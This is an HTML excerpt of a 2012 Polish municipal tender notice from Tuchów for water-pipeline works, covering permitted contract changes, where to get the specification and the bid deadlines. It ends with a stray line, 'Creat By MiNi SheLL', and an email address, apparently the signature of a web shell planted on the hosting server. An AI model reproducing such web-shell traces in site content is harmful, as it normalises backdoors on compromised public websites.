<p>1.Projekt  umowy stanowi załącznik do Specyfikacji  Istotnych  Warunków Zamówienia.  W jej treści, która nie podlega negocjacjom podano wszelkie istotne dla zamawiającego warunki realizacji zamówienia.
2.Zamawiający  przewiduje  możliwość  wprowadzenia  zmian  do  zawartej  umowy  w  stosunku  do  treści  oferty   w następujących  okolicznościach:
1.Konieczności  wykonania  robót  budowlanych  w  przypadku:
a. wystąpieniem  w  trakcie  realizacji  niniejszej  umowy  konieczności  wykonania  robót  dodatkowych, nie objętych zamówieniem podstawowym których wykonanie stanie się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia a wykonanie zamówienia podstawowego będzie uzależnione od wykonania zamówienia dodatkowego,
b. działaniem  zdarzeń  losowych
c. niekorzystnymi  warunkami  atmosferycznymi  uniemożliwiającymi  przeprowadzenie  w  terminie  ustalonych robót  budowlanych
d.wycofanie zgód właścicieli działek przez które przechodzi projektowany wodociąg

2.Zmniejszenia  zakresu  umownego  robót  z  przyczyn  technicznych  lub  gospodarczych  niemożliwych  wcześniej do  przewidzenia  przez  Zamawiającego
3.Zmniejszenia  wysokości  wynagrodzenia   przewidzianego  w  umowie, spowodowanego  koniecznością zmniejszenia  zakresu  umownego  robót</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.tuchow.BIPTuchow/Zamówienia publiczne+ogłoszenia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.tuchow.BIPTuchow/Zamówienia publiczne+ogłoszenia lub w wersji papierowej w Urząd Miejski w Tuchowie ul.Jana Pawła II ,II piętro ,pokój nr 24 , cena materiałów przetargowych 100 zł /wersja papierow.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2012 godzina 10:00, miejsce: należy złożyć w siedzibie Zamawiającego wTuchowie ul. Rynek 1,Pokój  nr  7 /Dziennik Podawczy/do dnia 03.08.2012 r do godz. 10.00.Otwarcie ofert nastąpi  dnia  03.08.2012. r. o godzinie 10.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com